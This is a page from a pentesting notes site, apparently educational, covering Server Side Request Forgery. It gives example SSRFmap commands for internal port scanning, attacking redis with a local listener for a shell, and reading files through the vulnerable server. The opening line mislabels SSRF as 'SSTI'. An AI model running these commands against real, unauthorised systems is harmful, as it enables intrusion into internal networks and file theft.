Cyber Security Notes

Server Side Request Forgery

Cyber Security Notes

Index
Attacking Web Applications
Attacking Web Applications
- CSRF Attacks
- Enumerating Web
- SQL Injection
- Server Side Request Forgery Server Side Request Forgery
  Table of contents
  - SSRFmap
- Server Side Template Injection (SSTI)
Binary Exploitation
Binary Exploitation
- How to use GDB
Cryptography
Cryptography
- Pretty Good Privacy (PGP)
- Asymmetric Encryption
  Asymmetric Encryption
  - RSA
    RSA
    
    RSA Attacks
    
    RSA Basics
- Symetric Encryption
  Symetric Encryption
  - AES
    AES
    
    AES Basics
General Pentesting
General Pentesting
- Data Exfiltration
- Miscellaneous Tools
- Miscellaneous Services
- Pivoting
- Port Scanning
- Password Attacks
  Password Attacks
  - Offline Password Attacks
  - Online Password Attacks
Miscellaneous
Miscellaneous
- Machine Learning & AI Attacks
  Machine Learning & AI Attacks
  - Creating Malicious Tensorflow Models
Pentesting Linux
Pentesting Linux
- Priviliage Escalation
- Linux - Stabilisation & Post Exploitation
Pentesting Windows
Pentesting Windows
- Creating Robust Reverse Shells
- Enumerating Windows
- Network Enumeration
- Windows - Stabilisation & Post Exploitation
- Windows Commands
- Windows Local Persistence
- Windows Privilage Escalation
- Windows Tools
- Active Directory
  Active Directory
  - Enumerating Users
  - Hashes & Tokens
    Hashes & Tokens
    
    ASREPRoasting
    
    Dumping Hashes
  - Post Exploitation
    Post Exploitation
    
    Enumaration of Active Directory
  - Remote Management
    Remote Management
    
    evil-winrm
- Windows Services
  Windows Services
  - Pentesting MS-SQL
  - SMB Protocol
Reverse Engineering & Forensics
Reverse Engineering & Forensics
- Memory Analysis
  Memory Analysis
- Reversing Python
  Reversing Python
  - Decompile .elf & .exe Binaries.md

Server Side Request Forgery¶

SSTI is a vulnerability that allows an attacker to force an application to make a request on their behalf. This can be used to access internal resources, pivot through the network, and more.

SSRFmap¶

SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.

Examples:

python ssrfmap.py -r examples/request2.txt -p url -m portscan
python ssrfmap.py -r examples/request.txt -p url -m redis
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles